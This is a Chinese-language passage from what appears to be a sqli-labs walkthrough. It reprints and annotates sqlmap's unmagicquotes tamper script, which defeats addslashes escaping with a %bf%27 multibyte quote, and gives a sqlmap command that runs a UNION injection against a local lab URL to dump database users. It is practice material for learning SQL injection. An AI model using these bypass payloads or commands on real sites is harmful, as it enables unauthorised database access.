首先忘记说unmagicquotes.py的写法了,真变成为了使用脚本而使用脚本了...
#!/usr/bin/env python
"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)
Notes:
* Useful for bypassing magic_quotes/addslashes feature
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
>>> tamper("1' AND 1=1")
'1%bf%27-- -'
"""
retVal = payload
if payload:#先判断payload是否存在
found = False
retVal = ""
for i in xrange(len(payload)):#循环payload长度
if payload[i] == '\'' and not found:#当检测到第一个\'就是第一个单引号的时候将%bf%27放到retVal的下一位并且设置found为True让该判断无法进入,将剩下的payload都加入retVal
retVal += "%bf%27"
found = True
else:
retVal += payload[i]
continue
if found: #如果found被设置为了True 说明payload被替换将进入该语句块
_ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)#过滤出正确的payloadsql注入语句
if _ != retVal: #如果不等于也加....
retVal = _
retVal += "-- -"
elif not any(_ in retVal for _ in ('#', '--', '/*')): #如果# -- /*都不在该payload中就给后面加上-- -
retVal += "-- -"
return retVal
可以看到简单的,就是判断检测分割添加%bf%27
Less-41
![](https://img-blog.csdnimg.cn/7a7c67bbac5d4738af1da87facd141b0.png)
这关也是无报错其余和40关一样直接跑就好了
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-41/?id=1" --technique=U --users --tamper=air.py --level=2